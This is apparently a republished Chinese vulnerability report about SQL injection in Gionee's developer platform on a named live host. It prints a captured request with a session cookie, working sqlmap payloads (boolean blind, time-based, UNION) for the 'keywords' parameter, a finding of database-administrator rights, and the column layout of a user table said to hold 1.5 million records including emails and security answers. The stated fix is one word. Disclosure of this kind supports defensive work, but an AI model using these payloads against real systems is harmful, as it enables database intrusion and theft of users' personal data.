频道栏目
首页 > 安全 > 网站安全 > 正文

金立某站root权限注入(涉及150W用户信息)

2015-12-24 09:13:56         来源:Looke   作者:Looke
收藏   我要投稿

RT

漏洞系统:金立开发者平台

漏洞地址:
 

0.png

Host: dev.anzhuoapk.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Referer: http://dev.anzhuoapk.com/application
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=schun19uqoup3m2o8g0f9nm2l6; Hm_lvt_eac5031a4265d98af4563220293c8e47=1446174018,1446174210,1446175352,1446451177; Hm_lpvt_eac5031a4265d98af4563220293c8e47=1446451190


keywords参数存在注入
 

---
Parameter: keywords (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND 4031=4031 AND '
%'='&status=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND (SELECT * FROM
(SELECT(SLEEP(5)))aeuV) AND '%'='&status=

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' UNION ALL SELECT NU
LL,NULL,NULL,CONCAT(0x71707a6271,0x7a5948426a714447456f7566745244524350524750766
b55434a494c4576495567427756686c4561,0x716a767a71),NULL,NULL,NULL-- &status=
---
[16:02:18] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.16
back-end DBMS: MySQL 5.0.12

数据库

数据库.png

DBA权限:

DBA.png

150W用户信息

150.png

Database: aorausermanagerdb
Table: aouserlistinfo
[9 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| Answer1      | varchar(100) |
| Answer2      | varchar(100) |
| Birthday     | date         |
| Email        | varchar(100) |
| Id           | int(11)      |
| Problem1Type | int(11)      |
| Problem2Type | int(11)      |
| Sex          | char(1)      |
| UserID       | int(11)      |
+--------------+--------------+

解决方案:

过滤.

上一篇:站长之家某站存在SQL注入漏洞
下一篇:178游戏网某处存在SQL注射漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站